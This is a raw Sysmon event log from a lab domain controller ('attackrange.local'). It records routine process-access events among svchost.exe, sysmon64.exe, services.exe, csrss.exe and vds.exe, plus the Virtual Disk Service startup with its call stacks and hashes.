08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.090{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.074{5D479F2C-169F-5F84-0A00-000000007F01}8562600C:\Windows\system32\services.exe{5D479F2C-16B2-5F84-3500-000000007F01}3384C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3500-000000007F01}3384C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16B2-5F84-3500-000000007F01}3384C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.057{5D479F2C-16B2-5F84-3500-000000007F01}3384C:\Windows\System32\vds.exe10.0.14393.2608 (rs1_release.181024-1742)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.058{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 